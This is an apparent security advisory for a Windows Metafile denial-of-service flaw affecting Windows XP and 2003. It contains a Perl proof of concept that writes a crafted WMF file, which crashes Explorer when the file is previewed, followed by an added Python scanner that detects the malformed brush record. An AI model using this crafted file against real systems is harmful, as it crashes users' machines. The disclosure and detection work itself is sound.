Description:
Yet another Windows Metafile (WMF) denial-of-service exploit.
System affected:
+ Windows XP SP2
+ Windows 2003 SP1
+ Windows XP SP1
+ Windows XP
+ Windows 2003
Tech info:
Page fault in gdi32!CreateBrushIndirect() caused by an invalid pointer access.
An incorrect (short) to (void*) sign extension is also present.
Exploit:
=== begin of brush.pl ===
#!/usr/bin/perl
# Writes a 68-byte WMF: META_HEADER, a META_CREATEBRUSHINDIRECT, a META_CREATEPEN,
# a second META_CREATEBRUSHINDIRECT carrying BrushStyle 8 and hatch 0x8000, then META_EOF.
print "\nWMF PoC denial of service exploit by cyanid-E <biz4rre\@gmail.com>";
print "\n\ngenerating brush.wmf...";
open(WMF, ">./brush.wmf") or die "cannot create wmf file\n";
print WMF "\x01\x00\x09\x00\x00\x03\x22\x00\x00\x00\x63\x79\x61\x6E\x69\x64";
print WMF "\x2D\x45\x07\x00\x00\x00\xFC\x02\x00\x00\x00\x00\x00\x00\x00\x00";
print WMF "\x08\x00\x00\x00\xFA\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00";
print WMF "\x07\x00\x00\x00\xFC\x02\x08\x00\x00\x00\x00\x00\x00\x80\x03\x00";
print WMF "\x00\x00\x00\x00";
close(WMF);
print "ok\n\nnow try to browse folder in XP explorer and wait :)\n";
=== end of brush.pl ===
Just run brush.pl and try to preview brush.wmf (or simply browse the folder
containing brush.wmf in Windows Explorer).
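The following is an added example, not part of the advisory: a small WMF record walker in Python that parses the META_HEADER and record stream and reports the two defects the advisory describes (the LogBrush record whose BrushStyle is not one of the in-record styles, and a hatch word that sign-extends to a bogus pointer when treated as a short), so a scanner or mail gateway can flag such files before a preview handler touches them. The input bytes are exactly those brush.pl writes; the benign file, the "only solid/null/hatched are valid in a LogBrush record" rule and the NumberOfObjects consistency check are this example's own assumptions, not statements from the advisory.

```python
import struct

# The 68 bytes brush.pl writes (advisory's own PoC file, used here as sample input).
BRUSH_WMF = bytes.fromhex(
    "010009000003220000006379616e6964"
    "2d4507000000fc020000000000000000"
    "08000000fa0200000000000000000000"
    "07000000fc0208000000000000800300"
    "00000000"
)
# Constructed benign file: header, one solid META_CREATEBRUSHINDIRECT, META_EOF.
BENIGN_WMF = bytes.fromhex(
    "010009000003130000000100070000000000"
    "07000000fc020000000000000000"
    "030000000000"
)

META_EOF = 0x0000
OBJECT_CREATORS = {0x00F7, 0x0142, 0x01F9, 0x02FA, 0x02FB, 0x02FC, 0x06FF}
META_CREATEBRUSHINDIRECT = 0x02FC
BS_SOLID, BS_NULL, BS_HATCHED = 0, 1, 2
HS_DIAGCROSS = 5   # highest hatch style a BS_HATCHED brush may carry

def parse_wmf(data):
    """Return (header dict, [(offset, function, params)]) for a non-placeable WMF."""
    if len(data) < 18:
        raise ValueError("too short for META_HEADER")
    names = ("Type", "HeaderSize", "Version", "Size",
             "NumberOfObjects", "MaxRecord", "NumberOfMembers")
    header = dict(zip(names, struct.unpack_from("<HHHIHIH", data, 0)))
    offset = header["HeaderSize"] * 2
    records = []
    while offset + 6 <= len(data):
        size_words, func = struct.unpack_from("<IH", data, offset)
        length = size_words * 2
        if length < 6 or offset + length > len(data):
            raise ValueError(f"record at {offset} declares {size_words} words, outside the file")
        records.append((offset, func, data[offset + 6:offset + length]))
        offset += length
        if func == META_EOF:
            break
    return header, records

def check_brush(offset, params):
    """Findings for one META_CREATEBRUSHINDIRECT (LogBrush) record."""
    if len(params) != 8:
        return [f"record@{offset}: LogBrush is {len(params)} bytes, expected 8"]
    style, _color, hatch_u = struct.unpack("<HIH", params)
    hatch_s = struct.unpack("<h", params[6:8])[0]   # value a (short) cast yields
    findings = []
    if style not in (BS_SOLID, BS_NULL, BS_HATCHED):
        findings.append(f"record@{offset}: BrushStyle {style} is not solid/null/hatched")
        if hatch_s < 0:   # negative short sign-extended into a pointer-sized value
            findings.append(f"record@{offset}: hatch 0x{hatch_u:04X} sign-extends to "
                            f"pointer 0x{hatch_s & 0xFFFFFFFF:08X} (32-bit)")
    elif style == BS_HATCHED and hatch_u > HS_DIAGCROSS:
        findings.append(f"record@{offset}: hatch style {hatch_u} out of range")
    return findings

def scan_wmf(data):
    """Return a list of human-readable findings; an empty list means nothing suspicious."""
    header, records = parse_wmf(data)
    findings = []
    if header["Size"] * 2 != len(data):
        findings.append(f"header Size {header['Size']} words != file length {len(data)}")
    created = sum(1 for _, func, _ in records if func in OBJECT_CREATORS)
    if header["NumberOfObjects"] > created:
        findings.append(f"header declares {header['NumberOfObjects']} objects, "
                        f"only {created} object-creating records present")
    if not records or records[-1][1] != META_EOF:
        findings.append("record stream does not end with META_EOF")
    for offset, func, params in records:
        if func == META_CREATEBRUSHINDIRECT:
            findings.extend(check_brush(offset, params))
    return findings

if __name__ == "__main__":
    for name, blob in (("brush.wmf", BRUSH_WMF), ("benign.wmf", BENIGN_WMF)):
        print(name, scan_wmf(blob) or "clean")
```

The third record (file offset 48) is the one the advisory's page fault comes from: its BrushStyle of 8 selects a pattern-style brush that a LogBrush record cannot legitimately describe, and the hatch word 0x8000 becomes -32768 under a (short) cast, which sign-extends to 0xFFFF8000 rather than staying a small positive index.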
Discovered:
06/24/2006; vendor informed, no response received.